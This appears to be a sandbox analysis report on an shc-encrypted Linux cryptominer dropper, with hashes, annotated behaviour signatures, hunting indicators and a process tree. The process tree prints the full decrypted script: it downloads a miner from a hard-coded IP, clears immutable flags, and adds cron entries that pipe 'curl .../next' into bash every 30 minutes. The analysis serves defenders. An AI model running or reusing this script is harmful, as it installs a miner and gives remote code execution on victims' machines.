Analysis

  • max time kernel
    10s
  • max time network
    130s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
  • submitted
    26-11-2024 12:41

General

  • Target

    样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

  • Size

    1023KB

  • MD5

    069ad3938c3f9c049f670a8eb49dc1d8

  • SHA1

    f4fd0c87a18d45ab4b642f32a94673c949ab7caf

  • SHA256

    84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295

  • SHA512

    3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb

  • SSDEEP

    12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses. Here it is the `chmod +x /var/tmp/.xrx/xrx` step (PIDs 1531 and 1544) that makes the freshly downloaded miner executable. The whole download/chmod sequence appears twice because gettingmineru() captures the size with `ls -l` before the file exists, so both the "miner not found" and the "filesize 0" branches call downloadminer(). Note also that both the curl and the wget fallback ran for each URL (`curl ... || cd1 ... || wget ...`; `cd1` is not a real command), which indicates the curl fetch failed in this environment — the payload may not actually have been retrieved even though /var/tmp/.xrx/xrx was still exec'd (PID 1547).

  • Attempts to change immutable files 4 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files. The script runs `chattr -ia` on /var/tmp/.xrx/xrx and /var/tmp/.xrx/config.json (PIDs 1517/1518, and again 1533/1534) immediately before `rm -rf`-ing them, i.e. it clears immutable/append-only flags that a previous install or a defender may have set so the payload can be replaced. On a clean sandbox these files do not exist yet, so the calls are expected to fail without effect here; on a real host the intent is defense evasion against file locking.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence. crontablegend() has two branches: as a non-root user it builds /dev/shm/.spark and installs it with `crontab .spark`; as root it appends directly to /etc/crontab. The `cat /etc/crontab | grep -q secure` children (PIDs 1545/1546) show the root branch ran here. The appends are shell builtins (`echo ... >> /etc/crontab`), so no child process appears for them — confirm the write from the dropped-files/filesystem view rather than from this tree. The scheduled entries matter more than the miner itself: `@daily` and `1 * * * *` runs of /var/tmp/.x/secure, `@reboot /var/tmp/.xrx/init.sh hide`, and every 30 minutes `curl 185.252.178.82:1011/next | bash` and `curl load.whitesnake.church:1011/next | bash` — unauthenticated remote code execution from the C2 on a schedule. Hunt for: /var/tmp/.xrx/, /var/tmp/.x/secure, /dev/shm/.spark, the literal string `secure` in any crontab, a process named xrx, and traffic to 185.252.178.82 (tcp/6972 and tcp/1011) or load.whitesnake.church.

  • Enumerates running processes

    Discovers information about currently running processes on the system. In this sample that is `pgrep xrx` (PIDs 1512 and 1549): run once at start to populate `ifrunning` and once after launching /var/tmp/.xrx/xrx to print its PID. It is a single-instance/keepalive check for the miner, not enumeration of other processes on the host.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem. Both this and "Reads CPU attributes" are attributed to the pgrep children (PIDs 1512, 1549) and to `ls -l` (PID 1514); reading /proc is how those tools work, so on their own these two signatures are low-signal tooling noise and should not be weighted as reconnaissance.

Processes

  • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    1⤵
      PID:1510
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
      1⤵
        PID:1510
      • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        1⤵
          PID:1510
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! 
cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
          1⤵
          • File and Directory Permissions Modification
          • Creates/modifies Cron job
          PID:1510
          • /usr/bin/pgrep
            pgrep xrx
            2⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:1512
          • /usr/bin/awk
            awk "{print \$5}"
            2⤵
              PID:1515
            • /bin/ls
              ls -l /var/tmp/.xrx/xrx
              2⤵
              • Reads runtime system information
              PID:1514
            • /bin/mkdir
              mkdir /var/tmp/.xrx
              2⤵
                PID:1516
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/xrx
                2⤵
                • Attempts to change immutable files
                PID:1517
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/config.json
                2⤵
                • Attempts to change immutable files
                PID:1518
              • /bin/rm
                rm -rf /var/tmp/.xrx/xrx
                2⤵
                  PID:1519
                • /bin/rm
                  rm -rf /var/tmp/.xrx/config.json
                  2⤵
                    PID:1520
                  • /usr/bin/curl
                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                    2⤵
                      PID:1521
                    • /usr/bin/wget
                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                      2⤵
                        PID:1523
                      • /usr/bin/curl
                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                        2⤵
                          PID:1527
                        • /usr/bin/wget
                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                          2⤵
                            PID:1529
                          • /bin/mv
                            mv config-xrx.json config.json
                            2⤵
                              PID:1530
                            • /bin/chmod
                              chmod +x /var/tmp/.xrx/xrx
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1531
                            • /bin/mkdir
                              mkdir /var/tmp/.xrx
                              2⤵
                                PID:1532
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/xrx
                                2⤵
                                • Attempts to change immutable files
                                PID:1533
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/config.json
                                2⤵
                                • Attempts to change immutable files
                                PID:1534
                              • /bin/rm
                                rm -rf /var/tmp/.xrx/xrx
                                2⤵
                                  PID:1535
                                • /bin/rm
                                  rm -rf /var/tmp/.xrx/config.json
                                  2⤵
                                    PID:1536
                                  • /usr/bin/curl
                                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                                    2⤵
                                      PID:1537
                                    • /usr/bin/wget
                                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                                      2⤵
                                        PID:1539
                                      • /usr/bin/curl
                                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                                        2⤵
                                          PID:1540
                                        • /usr/bin/wget
                                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                                          2⤵
                                            PID:1542
                                          • /bin/mv
                                            mv config-xrx.json config.json
                                            2⤵
                                              PID:1543
                                            • /bin/chmod
                                              chmod +x /var/tmp/.xrx/xrx
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:1544
                                            • /bin/grep
                                              grep -q secure
                                              2⤵
                                                PID:1546
                                              • /bin/cat
                                                cat /etc/crontab
                                                2⤵
                                                  PID:1545
                                                • /bin/sleep
                                                  sleep 1
                                                  2⤵
                                                    PID:1548
                                                  • /var/tmp/.xrx/xrx
                                                    /var/tmp/.xrx/xrx
                                                    2⤵
                                                      PID:1547
                                                    • /usr/bin/pgrep
                                                      pgrep xrx
                                                      2⤵
                                                      • Reads CPU attributes
                                                      • Reads runtime system information
                                                      PID:1549
